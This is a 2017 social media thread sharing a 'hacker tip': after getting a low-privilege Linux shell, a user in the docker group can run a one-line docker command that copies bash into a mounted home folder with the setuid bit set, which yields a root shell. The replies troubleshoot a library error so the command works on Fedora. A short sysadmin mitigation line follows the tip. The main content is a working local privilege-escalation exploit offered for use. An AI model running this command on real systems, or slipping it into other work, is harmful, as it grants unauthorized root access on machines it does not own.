zacharykeetonApr 17, 2017

HACKER TIP: If you pop a low-priv linux shell. Don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

screenshots and more here on my (crappy) blog: http://zacharykeeton.com/Linux_Privilege-Escalation-with-Docker/

SysAdmin tip: Don' t add any nonsudoers to the 'docker' group!

Show threadMike Patton ✅
@zacharykeeton Didn't work for me on my box. I got an error "/home/test/rootshell: error while loading shared libraries: libtinfo.so.5: cannot open shared object file: No such file or directory"
Apr 19, 2017 at 12:00amWeb
Show threadzacharykeetonApr 19, 2017
@machiavelli what distro? The command here runs an Ubuntu container on an Ubuntu host. You might have to adjust it if you are on RHEL or arch-based distro.
Show threadMike Patton ✅Apr 19, 2017
@zacharykeeton Fedora 24. The ubuntu container ran but then I got the error.
Show threadzacharykeetonApr 19, 2017
@machiavelli try fedora container